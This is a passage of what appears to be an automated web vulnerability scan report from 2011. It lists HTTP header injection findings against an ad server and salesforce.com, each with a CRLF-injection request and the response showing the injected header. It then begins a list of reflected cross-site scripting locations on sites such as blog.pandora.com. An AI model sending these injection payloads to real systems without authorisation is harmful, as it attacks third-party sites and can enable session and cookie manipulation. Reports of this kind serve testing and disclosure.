Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=62e1e%0d%0a91a63bf7646; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=62e1e
91a63bf7646&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:33 GMT
Connection: close
Content-Length: 0

2.24. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 73be8%0d%0adc5e96035d9 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=73be8%0d%0adc5e96035d9&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=73be8
dc5e96035d9&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:31 GMT
Connection: close
Content-Length: 0

2.25. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 729cd%0d%0a9fe4d8fa7d8 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=0&res=729cd%0d%0a9fe4d8fa7d8 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=729cd
9fe4d8fa7d8&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:32 GMT
Connection: close
Content-Length: 0

2.26. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 92f47%0d%0a539632693e7 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=92f47%0d%0a539632693e7&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=92f47
539632693e7; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:31 GMT
Connection: close
Content-Length: 0

2.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 156ae%0d%0a6ce59d4e5ce was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0156ae%0d%0a6ce59d4e5ce; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 1722
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0156ae
6ce59d4e5ce; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4Ki09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=09MYgA92sF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:06:32 GMT
Connection: close

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2.28. http://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.salesforce.com
Path:	/servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 39de9%0d%0a757ae29423 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /servlet/39de9%0d%0a757ae29423 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/39de9
757ae29423/
Date: Sun, 09 Jan 2011 02:54:11 GMT
Connection: close
Content-Length: 91

The URL has moved to <a href="/servlet/39de9
757ae29423/">/servlet/39de9
757ae29423/</a>

2.29. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.salesforce.com
Path:	/servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 46573%0d%0a0d8c9d6be83 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /servlet/46573%0d%0a0d8c9d6be83 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/46573
0d8c9d6be83/
Date: Sun, 09 Jan 2011 05:28:21 GMT
Connection: close
Content-Length: 93

The URL has moved to <a href="/servlet/46573
0d8c9d6be83/">/servlet/46573
0d8c9d6be83/</a>

3. Cross-site scripting (reflected) previous next
There are 712 instances of this issue:

http://ad.turn.com/server/pixel.htm [fpid parameter]
http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
http://admeld.adnxs.com/usersync [admeld_callback parameter]
http://ads.adxpose.com/ads/ads.js [uid parameter]
http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://blog.pandora.com/faq [REST URL parameter 1]
http://blog.pandora.com/faq/ [REST URL parameter 1]
http://blog.pandora.com/faq/index.xml [REST URL parameter 1]
http://blog.pandora.com/faq/index.xml [REST URL parameter 2]
http://blog.pandora.com/jobs [REST URL parameter 1]
http://blog.pandora.com/pandora/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 1]
http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 2]
http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 3]
http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 4]
http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 1]
